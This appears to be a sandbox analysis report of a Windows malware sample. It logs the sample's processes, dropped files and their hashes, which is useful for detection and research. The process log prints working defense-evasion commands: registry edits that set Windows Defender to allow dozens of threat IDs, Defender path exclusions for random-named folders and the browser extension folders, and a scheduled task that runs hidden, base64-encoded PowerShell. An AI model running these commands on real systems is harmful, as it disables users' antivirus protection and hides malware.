C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVDRwbqLW" /SC once /ST 00:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVDRwbqLW"2⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\BKngBackup\SyncBackupShell.exeFilesize
2.5MB
MD5b2a22d65280abb89e601550434af57a1
SHA11f38d1c222b44ad78d7050f7454ee9289c32452b
SHA256bbf2f049ace040531f02f74be8a62838f46fdb83c94d5d2a1a675f3288d7cdc3
SHA512c17d83af8b31275f1783df55792c71e6f47dc5a8e80f4d78ab62379a5a32c0b4c8966e2807922577ec5211efcee3ecde40e40c9f59a9ff2d1b298fbacebdf669
-
C:\Program Files (x86)\ImageComparer\IC329.exeFilesize
5.1MB
MD55a37ea79983033abd4da83a9c3b9d615
SHA1ea71b21a0afa2925b7afdc10921ee2dfe9e4bdcf
SHA2567115f59cfe36e2e6ce6f254110973ff72c054b8fdce560d4d6244afd47c90c74
SHA512eb2ce09697155434d659ed5e64738554d54039c903a08db61bc1a957168057b88c1e3662ecfce9fd8c1469ba394a817b442364856bc1877ca77a33200be32d48
-
C:\Program Files (x86)\ImageComparer\IC329.exeFilesize
5.1MB
MD55a37ea79983033abd4da83a9c3b9d615
SHA1ea71b21a0afa2925b7afdc10921ee2dfe9e4bdcf
SHA2567115f59cfe36e2e6ce6f254110973ff72c054b8fdce560d4d6244afd47c90c74
SHA512eb2ce09697155434d659ed5e64738554d54039c903a08db61bc1a957168057b88c1e3662ecfce9fd8c1469ba394a817b442364856bc1877ca77a33200be32d48
-
C:\Program Files (x86)\ImageComparer\IC329.exeFilesize
5.1MB
MD55a37ea79983033abd4da83a9c3b9d615
SHA1ea71b21a0afa2925b7afdc10921ee2dfe9e4bdcf
SHA2567115f59cfe36e2e6ce6f254110973ff72c054b8fdce560d4d6244afd47c90c74
SHA512eb2ce09697155434d659ed5e64738554d54039c903a08db61bc1a957168057b88c1e3662ecfce9fd8c1469ba394a817b442364856bc1877ca77a33200be32d48
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exeFilesize
1.7MB
MD5cd977fd8e4228b5910c6efd938d6d412
SHA17e226827103aa7bca9f2b63b1340ecb6422dfc6f
SHA256c18e5c8ffe6fa429bb88fdc3eca4b6e63304baf1c270b405eb6607ba7e7c8ab7
SHA5123f4db6a3d7cf6d78677a8f1da5b7e1c1c84b92e0880c9195046ea24961acd910ba24cbfaf0188420ff52ce7d7d7b53f833d917694807d12ab3d8f92702fa099a
-
C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exeFilesize
1.7MB
MD5cd977fd8e4228b5910c6efd938d6d412
SHA17e226827103aa7bca9f2b63b1340ecb6422dfc6f
SHA256c18e5c8ffe6fa429bb88fdc3eca4b6e63304baf1c270b405eb6607ba7e7c8ab7
SHA5123f4db6a3d7cf6d78677a8f1da5b7e1c1c84b92e0880c9195046ea24961acd910ba24cbfaf0188420ff52ce7d7d7b53f833d917694807d12ab3d8f92702fa099a
-
C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exeFilesize
6.8MB
MD5d5bbadf7eb608dbaeb7999385071d561
SHA1dddfe1f735c8c07831788f7e1ecfcca7b7bd61d4
SHA25677e7b35c5b347d17c238687e387b38ca5d2b26f40ed413d288d3ef177557295a
SHA512acd1afa271554625a01d83f6fbc83e7504c46a140a273b6b8eeefe56b023f5dcdc17fe354e1b296c83ac14769b63aeb4a29579a6189b2fd3b29fd7da264f72d9
-
C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exeFilesize
6.8MB
MD5d5bbadf7eb608dbaeb7999385071d561
SHA1dddfe1f735c8c07831788f7e1ecfcca7b7bd61d4
SHA25677e7b35c5b347d17c238687e387b38ca5d2b26f40ed413d288d3ef177557295a
SHA512acd1afa271554625a01d83f6fbc83e7504c46a140a273b6b8eeefe56b023f5dcdc17fe354e1b296c83ac14769b63aeb4a29579a6189b2fd3b29fd7da264f72d9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efb1apwq.k1s.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exeFilesize
6.8MB
MD5d5bbadf7eb608dbaeb7999385071d561
SHA1dddfe1f735c8c07831788f7e1ecfcca7b7bd61d4
SHA25677e7b35c5b347d17c238687e387b38ca5d2b26f40ed413d288d3ef177557295a
SHA512acd1afa271554625a01d83f6fbc83e7504c46a140a273b6b8eeefe56b023f5dcdc17fe354e1b296c83ac14769b63aeb4a29579a6189b2fd3b29fd7da264f72d9
-
C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exeFilesize
6.8MB
MD5d5bbadf7eb608dbaeb7999385071d561
SHA1dddfe1f735c8c07831788f7e1ecfcca7b7bd61d4
SHA25677e7b35c5b347d17c238687e387b38ca5d2b26f40ed413d288d3ef177557295a
SHA512acd1afa271554625a01d83f6fbc83e7504c46a140a273b6b8eeefe56b023f5dcdc17fe354e1b296c83ac14769b63aeb4a29579a6189b2fd3b29fd7da264f72d9
-
C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmpFilesize
656KB
MD57f9f5da24fa849ab560f986f1f38d6a0
SHA1b421f980946ca3b3acda363f8bbcb5f7db7466f2
SHA2565bbb7c9ab829e5c1c20674aeb7303dd88f7799568b632c18ebe0584cfbb27890
SHA51228b047f86bb5241d840cb84369b942e94c8bb85e72decb87c7237d43ca64a3d1c3a9a500576a7f5de872af3172154e844531deed667da3a4b4fbd7d34e90f196
-
C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmpFilesize
656KB
MD57f9f5da24fa849ab560f986f1f38d6a0
SHA1b421f980946ca3b3acda363f8bbcb5f7db7466f2
SHA2565bbb7c9ab829e5c1c20674aeb7303dd88f7799568b632c18ebe0584cfbb27890
SHA51228b047f86bb5241d840cb84369b942e94c8bb85e72decb87c7237d43ca64a3d1c3a9a500576a7f5de872af3172154e844531deed667da3a4b4fbd7d34e90f196
-
C:\Users\Admin\AppData\Local\Temp\is-9CJVH.tmp\_isetup\_iscrypt.dllFilesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
C:\Users\Admin\AppData\Local\Temp\is-9CJVH.tmp\_isetup\_isdecmp.dllFilesize
13KB
MD5a813d18268affd4763dde940246dc7e5
SHA1c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4
-
C:\Users\Admin\AppData\Local\Temp\is-9CJVH.tmp\_isetup\_isdecmp.dllFilesize
13KB
MD5a813d18268affd4763dde940246dc7e5
SHA1c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4
-
C:\Users\Admin\AppData\Local\Temp\is-9CJVH.tmp\_isetup\_isdecmp.dllFilesize
13KB
MD5a813d18268affd4763dde940246dc7e5
SHA1c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4
-
C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmpFilesize
659KB
MD563bdf487b26c0886dbced14bab4d4257
SHA1e3621d870aa54d552861f1c71dea1fb36d71def6
SHA256ca5e816fa95cbcd2a880f2c319d3ddf09686e96ee633af63a396969e5e62335a
SHA512b433e540c9da175efdd09d44be39c563176046d89aa03edcc43e3582aa1f180e40e283503d152a46e07d4e77f8fa18b76118e425961b507ad5ca3864c39a7c40
-
C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmpFilesize
659KB
MD563bdf487b26c0886dbced14bab4d4257
SHA1e3621d870aa54d552861f1c71dea1fb36d71def6
SHA256ca5e816fa95cbcd2a880f2c319d3ddf09686e96ee633af63a396969e5e62335a
SHA512b433e540c9da175efdd09d44be39c563176046d89aa03edcc43e3582aa1f180e40e283503d152a46e07d4e77f8fa18b76118e425961b507ad5ca3864c39a7c40
-
C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmpFilesize
658KB
MD5f41b7e0820ac65586c014fe78e0d2e2b
SHA1c1f4514da16a703b7faadca27e966fe2001e9a87
SHA256059bbf7dccca1f2d49e144de237b6f7364bc72f3979f6a681374802feba25afd
SHA512c16ff3f423f94b040a30a41a41963a012e6dbd9a0b8c3b5aada2c0b409592699a98276cc165d1e8d421e1f5eda417132235a8235fe7aa97fac7374f7b45704b1
-
C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmpFilesize
658KB
MD5f41b7e0820ac65586c014fe78e0d2e2b
SHA1c1f4514da16a703b7faadca27e966fe2001e9a87
SHA256059bbf7dccca1f2d49e144de237b6f7364bc72f3979f6a681374802feba25afd
SHA512c16ff3f423f94b040a30a41a41963a012e6dbd9a0b8c3b5aada2c0b409592699a98276cc165d1e8d421e1f5eda417132235a8235fe7aa97fac7374f7b45704b1
-
C:\Users\Admin\AppData\Local\Temp\is-OV7IN.tmp\_isetup\_iscrypt.dllFilesize
2KB
MD5a69559718ab506675e907fe49deb71e9
